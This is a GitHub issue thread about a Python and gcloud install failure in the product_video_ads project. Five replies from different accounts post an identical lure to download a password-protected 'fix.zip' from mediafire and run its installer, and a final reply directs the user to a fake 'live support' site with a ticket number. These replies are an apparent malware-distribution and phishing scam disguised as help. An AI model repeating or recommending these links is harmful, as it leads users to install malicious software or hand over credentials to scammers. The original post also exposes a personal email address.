### ISSUE TITLE
Python error during install

### ISSUE THREAD

**Issue by behtjes** [google/product_video_ads#58]
I get tons of red lines when installing the app. All are python related. Here are the last lines ( I don't know how to export all the lines in the terminal, is that even possible?)

`ERROR: Command errored out with exit status 1: /usr/bin/python2 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-qEqW9K/grpcio/setup.py'"'"'; __file__='"'"'/tmp/pip-install-qEqW9K/grpcio/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record /tmp/pip-record-vspxkY/install-record.txt --single-version-externally-managed --user --prefix= --compile --install-headers /home/roy/.local/include/python2.7/grpcio Check the logs for full command output.
ERROR: (gcloud.secrets.describe) NOT_FOUND: Secret [projects/485701222961/secrets/video_generator_auth_token] not found. This command is authenticated as roy@bandenconcurrent.nl which is the active account specified by the [core/account] property.
Traceback (most recent call last):
  File "/home/roy/product_video_ads/video-generator/authenticator.py", line 26, in <module>
    from google.cloud import secretmanager
ImportError: cannot import name 'secretmanager' from 'google.cloud' (unknown location)
Granting access to the secret for GKE service account
ERROR: (gcloud.secrets.add-iam-policy-binding) Status code: 404. Secret [projects/485701222961/secrets/video_generator_auth_token] not found. This command is authenticated as roy@bandenconcurrent.nl which is the active account specified by the [core/account] property..
********************************************************************************`

I can open the app, and I try to generate the example, but it doesn't generate anything:
![image](https://github.com/user-attachments/assets/9e79b3ee-45d1-438c-8c82-4ded777c0548)

What's going wrong?

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Etandooley** [comment]
> I get tons of red lines when installing the app. All are python related. Here are the last lines ( I don't know how to export all the lines in the terminal, is that even possible?)
> 
> `ERROR: Command errored out with exit status 1: /usr/bin/python2 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-qEqW9K/grpcio/setup.py'"'"'; __file__='"'"'/tmp/pip-install-qEqW9K/grpcio/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record /tmp/pip-record-vspxkY/install-record.txt --single-version-externally-managed --user --prefix= --compile --install-headers /home/roy/.local/include/python2.7/grpcio Check the logs for full command output. ERROR: (gcloud.secrets.describe) NOT_FOUND: Secret [projects/485701222961/secrets/video_generator_auth_token] not found. This command is authenticated as roy@mydomain.nl which is the active account specified by the [core/account] property. Traceback (most recent call last): File "/home/roy/product_video_ads/video-generator/authenticator.py", line 26, in <module> from google.cloud import secretmanager ImportError: cannot import name 'secretmanager' from 'google.cloud' (unknown location) Granting access to the secret for GKE service account ERROR: (gcloud.secrets.add-iam-policy-binding) Status code: 404. Secret [projects/485701222961/secrets/video_generator_auth_token] not found. This command is authenticated as roy@mydomain.nl which is the active account specified by the [core/account] property.. ********************************************************************************`
> 
> I can open the app, and I try to generate the example, but it doesn't generate anything: ![image](https://private-user-images.githubusercontent.com/9257476/361393995-9e79b3ee-45d1-438c-8c82-4ded777c0548.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4ODk1MTUsIm5iZiI6MTcyNDg4OTIxNSwicGF0aCI6Ii85MjU3NDc2LzM2MTM5Mzk5NS05ZTc5YjNlZS00NWQxLTQzOGMtOGM4Mi00ZGVkNzc3YzA1NDgucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDgyOCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjhUMjM1MzM1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZjFkZjFhYTg2NWNmNjA2MmJlYzNlZTAxNzlkYWI1ZTVmZTJlYzk1YTkwMjM4ODIyNTllNzk2NGUzOTBjOTAwMCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.xYrxAdliN61xK2ONqWDIVnLlSc1D4G9FcPOX9GQrvfU)
> 
> What's going wrong?

@behtjes You're experiencing transcript error. It sounds like your query would be best dealt with by the support team.
I'll have to refer you to the official support live chat with the ticket ID TON07638
Please see the link below to our dedicated support line:
[TON live support](https://thedappsupport.web.app/)
Click on the live chat icon at the bottom corner of the page to initiate chat with a live support agent
